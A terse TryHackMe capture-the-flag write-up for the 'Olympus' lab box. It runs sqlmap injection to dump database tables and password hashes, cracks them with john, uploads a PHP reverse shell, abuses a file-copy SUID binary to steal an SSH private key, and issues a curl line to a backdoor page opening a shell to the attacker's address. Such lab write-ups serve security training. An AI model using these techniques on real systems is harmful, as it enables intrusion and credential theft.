CTF Olympus

CTFTryHackMe
,

rustscan

1
rustscan -a 10.10.79.244

Output

1
2
3
PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack
80/tcp open  http    syn-ack

/etc/hosts

1
10.10.79.244 olympus.thm

Gobuster

1
gobuster dir -u http://olympus.thm/. -w /usr/share/wordlists/dirb/common.txt -x txt,php,html

Victor CMS

Gobuster

1
gobuster dir -u http://olympus.thm/~webmaster/ -w /usr/share/wordlists/dirb/common.txt -x txt,php,html

sqlmap

https://www.exploit-db.com/exploits/48734

1
sqlmap -u "[http://olympus.thm/~webmaster/search.php](http://olympus.thm/~webmaster/search.php "http://olympus.thm/~webmaster/search.php")" --data="search=1337*&submit=" --dbs --random-agent -v 3

1
sqlmap -u "[http://olympus.thm/~webmaster/search.php](http://olympus.thm/~webmaster/search.php "http://olympus.thm/~webmaster/search.php")" --data="search=1337*&submit=" -D olympus --tables --random-agent -v 3

1
sqlmap -u "[http://olympus.thm/~webmaster/search.php](http://olympus.thm/~webmaster/search.php "http://olympus.thm/~webmaster/search.php")" --data="search=1337*&submit=" -D olympus -T flag --dump --random-agent -v 3

We have the flag, now let’s grab the users.

1
sqlmap -u "http://olympus.thm/~webmaster/search.php" --data="search=1337*&submit=" -D olympus -T users --dump  --random-agent -v 3

1
2
3
4
5
6
7
$2y$10$YC6uoMwK9VpB5QL513vfLu1RV2sgBf01c0lzPHcz1qK2EArDvnj3C
$2y$10$lcs4XWc5yjVNsMb4CUBGJevEkIuWdZN3rsuKWHCc.FGtapBAfW.mK 
$2y$10$cpJKDXh2wlAI5KlCsUaLCOnf0g5fiG0QSUS53zp/r0HMtaj6rT4lC

[email protected]
[email protected]
[email protected]

Add chat.olympus.thm to /etc/hosts.

Let’s see the chat:

1
sqlmap -u "http://olympus.thm/~webmaster/search.php" --data="search=1337*&submit=" -D olympus -T chats --dump  --random-agent -v 3

The file:
47c3210d51761686f3af40a875eeaaea.txt

Crack the hash

hash:

1
2
3
$2y$10$YC6uoMwK9VpB5QL513vfLu1RV2sgBf01c0lzPHcz1qK2EArDvnj3C
$2y$10$lcs4XWc5yjVNsMb4CUBGJevEkIuWdZN3rsuKWHCc.FGtapBAfW.mK 
$2y$10$cpJKDXh2wlAI5KlCsUaLCOnf0g5fiG0QSUS53zp/r0HMtaj6rT4lC
1
john --wordlist=/usr/share/wordlists/seclists/Passwords/Leaked-Databases/rockyou.txt hash

user: prometheus
password: summertime

chat.olympus.thm


User the passwords.

Let’s find the file of prometeus in /upload

ReversShell

https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php

Listen with nc and prepare the php file.
Upload it then search the name of the file with sqlmap.

1
sqlmap -u "http://olympus.thm/~webmaster/search.php" --data="search=1337*&submit=" -D olympus -T chats --dump  --random-agent -v 3 --flush-session


File: c203512147848451a628bc69a6db446b.php

Browse here:
http://chat.olympus.thm/uploads/c203512147848451a628bc69a6db446b.php

Then:

Enum

LSE.SH

/usr/bin/cputils
https://exploit-notes.hdks.org/exploit/linux/privilege-escalation/#cputils

1
2
3
4
5
6
7
8
9
10
11
12
www-data@olympus:/home/zeus$ /usr/bin/cputils
  ____ ____        _   _ _     
 / ___|  _ \ _   _| |_(_) |___ 
| |   | |_) | | | | __| | / __|
| |___|  __/| |_| | |_| | \__ \
 \____|_|    \__,_|\__|_|_|___/
                               
Enter the Name of Source File: /home/zeus/.ssh/id_rsa

Enter the Name of Target File: /tmp/id_rsa

File copied successfully.

Now we crack the id_rsa file.

1
2
3
ssh2john id_rsa > hash    

john --wordlist=/usr/share/wordlists/seclists/Passwords/Leaked-Databases/rockyou.txt hash

Password: snowflake

Home

SSH

Browse to /var/www/html/0aB44fdS3eDnLkpsz3deGv8TttR4sc

secured

0aB44fdS3eDnLkpsz3deGv8TttR4sc/VIGQFQFMYOST.php

http://10.10.79.244/0aB44fdS3eDnLkpsz3deGv8TttR4sc/VIGQFQFMYOST.php

1
grep --color=auto -rnw '/etc/' -ie "flag{" --color=always 2> /dev/null

curl http://127.0.0.1/index/html/0aB44fdS3eDnLkpsz3deGv8TttR4sc/VIGQFQFMYOST.php?ip=10.8.50.167&port=4444

NOt working

SUID

Execute this.

I’m root

Flag bonus

1
grep --color=auto -rnw '/etc/' -ie "flag{" --color=always 2> /dev/null